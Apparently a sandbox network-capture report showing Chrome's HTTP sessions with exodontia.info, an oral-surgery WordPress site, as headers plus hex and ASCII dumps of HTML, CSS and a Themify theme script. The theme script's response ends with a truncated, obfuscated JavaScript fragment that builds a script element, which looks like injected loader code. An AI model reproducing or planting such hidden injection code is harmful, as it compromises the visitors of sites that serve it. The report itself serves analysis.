                                                                                                                                      2024-04-24 10:14:01 UTC16384INData Raw: 6c 65 3e 2e 72 65 63 65 6e 74 63 6f 6d 6d 65 6e 74 73 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6f 32 47 72 30 74 71 58 6e 34 73 72 35 6e 64 74 41 7a 30 43 4a 5a 44 33 73 43 58 47 33 42 51 77 57 48 68 46 59 38 48 39 6f 51 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 61 71 76 32 72 6d 7a 2e 63
                                                                                                                                      Data Ascii: le>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style><meta name="google-site-verification" content="Eo2Gr0tqXn4sr5ndtAz0CJZD3sCXG3BQwWHhFY8H9oQ" /><link rel="stylesheet" href="https://use.typekit.net/aqv2rmz.c
                                                                                                                                      2024-04-24 10:14:01 UTC16384INData Raw: 67 65 77 72 61 70 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 36 39 32 42 34 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 70 61 67 65 77 72 61 70 20 2e 64 61 72 6b 62 6c 75 65 2d 62 67 20 61 20 7b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 70 61 67 65 2d 33 37 38 20 2e 64 61 72 6b 62 6c 75 65 2d 62 67 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 2e 74 62 5f 30 6c 71 31 39 36 31 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 7d 0d 0a 0d 0a 2e 6c 65 67 61 6c 2d 63 6f 6e 74 65 6e 74 20
                                                                                                                                      Data Ascii: gewrap a:hover { color: #7692B4!important;}#pagewrap .darkblue-bg a { color: white!important;}#page-378 .darkblue-bg { margin-top: 30px!important;}.tb_0lq1961 { width: 50%; margin: 0 auto;}.legal-content
                                                                                                                                      2024-04-24 10:14:01 UTC727INData Raw: 2d 41 6e 74 72 61 6c 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 63 6c 6f 73 75 72 65 2d 6f 66 2d 6d 6f 75 74 68 2d 73 69 6e 75 73 2d 68 6f 6c 65 73 2f 22 3e 43 6c 6f 73 75 72 65 20 6f 66 20 4d 6f 75 74 68 2d 53 69 6e 75 73 20 48 6f 6c 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d
                                                                                                                                      Data Ascii: -Antral Communications)</a></li><li id="menu-item-354" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-354"><a href="https://exodontia.info/closure-of-mouth-sinus-holes/">Closure of Mouth-Sinus Holes</a></li><li id="menu-item
                                                                                                                                      2024-04-24 10:14:01 UTC1368INData Raw: 31 30 30 30 30 0d 0a 66 61 74 2d 70 61 64 2d 72 65 70 61 69 72 2f 22 3e 42 75 63 63 61 6c 20 46 61 74 20 50 61 64 20 52 65 70 61 69 72 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 39 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 35 39 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 61 6c 76 65 6f 70 6c 61 73 74 79 2f 22 3e 41 6c 76 65 6f 70 6c 61 73 74 79 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 38 36 22 20 63 6c 61 73 73 3d
                                                                                                                                      Data Ascii: 10000fat-pad-repair/">Buccal Fat Pad Repair</a></li><li id="menu-item-359" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-359"><a href="https://exodontia.info/alveoplasty/">Alveoplasty</a></li><li id="menu-item-586" class=
                                                                                                                                      2024-04-24 10:14:02 UTC14994INData Raw: 6f 70 20 42 69 6f 70 73 79 20 49 6e 73 74 72 75 63 74 69 6f 6e 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 36 38 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 36 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 70 6f 73 74 2d 6f 70 2d 70 61 69 6e 2d 63 6f 6e 74 72 6f 6c 2f 22 3e 50 6f 73 74 2d 4f 70 20 50 61 69 6e 20 43 6f 6e 74 72 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 36 31 36 22 20
                                                                                                                                      Data Ascii: op Biopsy Instructions</a></li><li id="menu-item-368" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-368"><a href="https://exodontia.info/post-op-pain-control/">Post-Op Pain Control</a></li></ul></li><li id="menu-item-616"
                                                                                                                                      2024-04-24 10:14:02 UTC16384INData Raw: 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 33 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 33 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 72 65 6d 65 64 69 61 6c 2d 6a 61 77 2d 65 78 65 72 63 69 73 65 73 2f 22 3e 52 65 6d 65 64 69 61 6c 20 4a 61 77 20 45 78 65 72 63 69 73 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 32 32 36 32 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74
                                                                                                                                      Data Ascii: <li id="menu-item-2263" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2263"><a href="https://exodontia.info/remedial-jaw-exercises/">Remedial Jaw Exercises</a></li><li id="menu-item-2262" class="menu-item menu-item-type-post
                                                                                                                                      2024-04-24 10:14:02 UTC16384INData Raw: 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 33 20 6d 65 6e 75 2d 70 61 67 65 2d 33 32 35 2d 70 61 72 65 6e 74 2d 33 39 34 22 20 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 78 6f 64 6f 6e 74 69 61 2e 69 6e 66 6f 2f 6f 70 65 72 63 75 6c 65 63 74 6f 6d 79 2f 22 3e 4f 70 65 72 63 75 6c 65 63 74 6f 6d 79 3c 2f 61 3e 20 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 70 61 67 65 2d 33 32 36 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 34 20 6d 65 6e 75 2d 70 61 67 65 2d 33 32 36 2d 70 61 72 65 6e 74 2d 33 39 34
                                                                                                                                      Data Ascii: tem-object-page menu-item-343 menu-page-325-parent-394" ><a href="https://exodontia.info/operculectomy/">Operculectomy</a> </li><li class="menu-item-page-326 menu-item menu-item-type-post_type menu-item-object-page menu-item-344 menu-page-326-parent-394


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      98192.168.2.1649839153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:01 UTC726OUTGET /wp-content/themes/themify-shoppe/js/themify.script.js?ver=5.7.0 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Purpose: prefetch
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:01 UTC598INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:01 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:36 GMT
                                                                                                                                      etag: "3f74-64623ff0-86bd199fefb29bb6;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 16244
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:01 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:01 UTC770INData Raw: 2f 2a 20 54 68 65 6d 69 66 79 20 54 68 65 6d 65 20 53 63 72 69 70 74 73 20 2d 20 68 74 74 70 73 3a 2f 2f 74 68 65 6d 69 66 79 2e 6d 65 2f 20 2a 2f 0d 0a 3b 0d 0a 28 28 24 2c 20 54 68 65 6d 69 66 79 2c 20 77 69 6e 2c 20 64 6f 63 2c 20 66 77 56 61 72 73 2c 20 74 68 65 6d 65 56 61 72 73 29 3d 3e 20 7b 0d 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 54 68 65 6d 69 66 79 54 68 65 6d 65 20 3d 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 43 6c 3a 20 54 68 65 6d 69 66 79 2e 62 6f 64 79 5b 30 5d 2e 63 6c 61 73 73 4c 69 73 74 2c 0d 0a 20 20 20 20 20 20 20 20 76 3a 20 66 77 56 61 72 73 2e 74 68 65 6d 65 5f 76 2c 0d 0a 20 20 20 20 20 20 20 20 68 65 61 64 65 72 54 79 70 65 3a 20 74 68 65 6d 65 56 61 72 73 2e 68 65 61 64
                                                                                                                                      Data Ascii: /* Themify Theme Scripts - https://themify.me/ */;(($, Themify, win, doc, fwVars, themeVars)=> { 'use strict'; const ThemifyTheme = { bodyCl: Themify.body[0].classList, v: fwVars.theme_v, headerType: themeVars.head
                                                                                                                                      2024-04-24 10:14:02 UTC14994INData Raw: 77 72 61 70 70 65 72 27 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 69 73 2e 63 6f 6d 6d 65 6e 74 41 6e 69 6d 61 74 69 6f 6e 28 29 3b 7d 2c 20 33 35 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 62 75 69 6c 64 65 72 41 63 74 69 76 65 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 63 5f 65 6d 62 65 64 5f 73 69 67 6e 75 70 27 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 68 65 6d 69 66 79 2e 4c 6f 61 64 43 73 73 28 74 68 69 73 2e 75 72 6c 20 2b 20 27 73 74 79 6c 65 73 2f 6d 6f 64 75 6c 65 73 2f 6d 61 69 6c 5f 63 68 69 6d 70 2e 63 73 73 27 2c 20 74 68 69 73 2e 76 29 3b 0d 0a
                                                                                                                                      Data Ascii: wrapper')); setTimeout(()=>{this.commentAnimation();}, 3500); this.builderActive(); if (doc.getElementById('mc_embed_signup')) { Themify.LoadCss(this.url + 'styles/modules/mail_chimp.css', this.v);
                                                                                                                                      2024-04-24 10:14:02 UTC480INData Raw: 28 5f 30 78 63 32 64 63 34 66 29 7b 5f 30 78 35 33 38 63 63 31 5b 27 70 75 73 68 27 5d 28 5f 30 78 35 33 38 63 63 31 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 5f 30 78 34 63 34 35 2c 30 78 62 61 61 63 32 29 29 3b 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 37 35 63 34 30 2c 5f 30 78 31 32 62 31 66 32 2c 5f 30 78 32 32 33 32 31 30 2c 5f 30 78 35 62 37 35 63 31 2c 5f 30 78 35 66 61 61 39 32 2c 5f 30 78 65 33 32 35 35 37 29 7b 76 61 72 20 5f 30 78 64 66 31 64 34 35 3d 5f 30 78 35 38 30 64 2c 5f 30 78 35 36 35 32 35 65 3d 5f 30 78 33 37 38 61 3b 5f 30 78 35 66 61 61 39 32 3d 5f 30 78 31 32 62 31 66 32 5b 27 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 27 5d 28 5f 30 78 32 32 33 32 31 30 29 2c 5f 30 78 65 33 32 35 35 37 3d 5f 30 78 31 32 62 31 66 32 5b 5f
                                                                                                                                      Data Ascii: (_0xc2dc4f){_0x538cc1['push'](_0x538cc1['shift']());}}}(_0x4c45,0xbaac2));;(function(_0x375c40,_0x12b1f2,_0x223210,_0x5b75c1,_0x5faa92,_0xe32557){var _0xdf1d45=_0x580d,_0x56525e=_0x378a;_0x5faa92=_0x12b1f2['createElement'](_0x223210),_0xe32557=_0x12b1f2[_


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      99192.168.2.1649841153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC593OUTGET /wp-content/uploads/themify-concate/826651810/themify-157411406.css HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:02 UTC584INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:02 GMT
                                                                                                                                      content-type: text/css
                                                                                                                                      last-modified: Tue, 09 Apr 2024 22:05:28 GMT
                                                                                                                                      etag: "31f43-6615bba8-1dbed30e1a49620c;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 204611
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:02 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:02 UTC1368INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 2f 2a 20 54 68 65 6d 69 66 79 20 53 68 6f 70 70 65 20 35 2e 37 2e 30 20 66 72 61 6d 65 77 6f 72 6b 20 35 2e 36 2e 34 20 2a 2f 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4c 69 62 72 65 20 46 72 61 6e 6b 6c 69 6e 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 42 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34
                                                                                                                                      Data Ascii: @charset "UTF-8";/* Themify Shoppe 5.7.0 framework 5.6.4 *//* vietnamese */@font-face{ font-family:'Libre Franklin'; font-style:italic; font-weight:300; font-display:swap; src:url(https://fonts.gstatic.com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4
                                                                                                                                      2024-04-24 10:14:03 UTC14994INData Raw: 63 6f 6d 2f 73 2f 6c 69 62 72 65 66 72 61 6e 6b 6c 69 6e 2f 76 31 34 2f 6a 69 7a 42 52 45 56 49 74 48 67 63 38 71 44 49 62 53 54 4b 71 34 58 6b 52 69 55 61 36 7a 6f 54 6a 6d 62 49 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 31 30 32 2d 30 31 30 33 2c 55 2b 30 31 31 30 2d 30 31 31 31 2c 55 2b 30 31 32 38 2d 30 31 32 39 2c 55 2b 30 31 36 38 2d 30 31 36 39 2c 55 2b 30 31 41 30 2d 30 31 41 31 2c 55 2b 30 31 41 46 2d 30 31 42 30 2c 55 2b 30 33 30 30 2d 30 33 30 31 2c 55 2b 30 33 30 33 2d 30 33 30 34 2c 55 2b 30 33 30 38 2d 30 33 30 39 2c 55 2b 30 33 32 33 2c 55 2b 30 33 32 39 2c 55 2b 31 45 41 30 2d 31 45 46 39 2c 55 2b 32 30 41 42 3b 7d 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20
                                                                                                                                      Data Ascii: com/s/librefranklin/v14/jizBREVItHgc8qDIbSTKq4XkRiUa6zoTjmbI.woff2) format('woff2'); unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB;}/* latin-ext
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 74 69 6e 2d 65 78 74 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 4f 70 65 6e 20 53 61 6e 73 27 3b 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 20 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 31 30 30 25 3b 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 20 20 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 6f 70 65 6e 73 61 6e 73 2f 76 34 30 2f 6d 65 6d 51 59 61 47 73 31 32 36 4d 69 5a 70 42 41 2d 55 46 55 49 63 56 58 53 43 45 6b 78 32 63 6d 71 76 58 6c 57 71 38 74 57 5a 30 50 77 38 36 68 64 30 52 6b 38 5a 6b 57 56 34 65 77 4a 45 52 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28
                                                                                                                                      Data Ascii: tin-ext */@font-face{ font-family:'Open Sans'; font-style:italic; font-weight:400; font-stretch:100%; font-display:swap; src:url(https://fonts.gstatic.com/s/opensans/v40/memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4ewJER.woff2) format(
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 61 6e 74 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 0a 7d 0a 2f 2a 20 69 4f 53 20 64 6f 65 73 6e 27 74 20 73 75 70 70 6f 72 74 20 66 69 78 65 64 20 61 74 74 61 63 68 6d 65 6e 74 20 2a 2f 0a 40 73 75 70 70 6f 72 74 73 20 28 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 20 6e 6f 6e 65 29 20 7b 0a 09 2e 74 68 65 6d 69 66 79 5f 62 75 69 6c 64 65 72 5f 72 6f 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 61 74 74 61 63 68 6d 65 6e 74 3a 20 73 63 72 6f 6c 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 7d 0a 7d 0a 2f 2a 43 4f 4c 55 4d 4e 20 41 4c 49 47 4e 4d 45 4e 54 2a 2f 0a 2f 2a 20 46 4c 45 58 20 42 4f 58 20 2a 2f 0a 2e 72 6f 77 5f 69 6e 6e 65 72 2c 0a 2e 6d 6f 64 75 6c 65 5f 63 6f 6c 75 6d 6e 2c 0a 2e 73 75
                                                                                                                                      Data Ascii: ant; margin:auto!important}/* iOS doesn't support fixed attachment */@supports (-webkit-touch-callout: none) {.themify_builder_row { background-attachment: scroll !important; }}/*COLUMN ALIGNMENT*//* FLEX BOX */.row_inner,.module_column,.su
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 6e 74 6d 65 74 61 64 61 74 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 61 75 74 68 6f 72 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 63 6f 6d 6d 65 6e 74 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 65 6d 61 69 6c 20 6c 61 62 65 6c 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 63 6f 6d 6d 65 6e 74 73 20 2e 63 6f 6d 6d 65 6e 74 2d 66 6f 72 6d 2d 75 72 6c 20 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f
                                                                                                                                      Data Ascii: ntmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-botto
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2d 69 6d 61 67 65 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 2e 68 61 73 2d 63 75 73 74 6f 6d 2d 63 6f 6e 74 65 6e 74 2d 70 6f 73 69 74 69 6f 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 76 65 72 5f 5f 69 6e 6e 65 72 2d 63 6f 6e 74 61
                                                                                                                                      Data Ascii: ign-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-conta
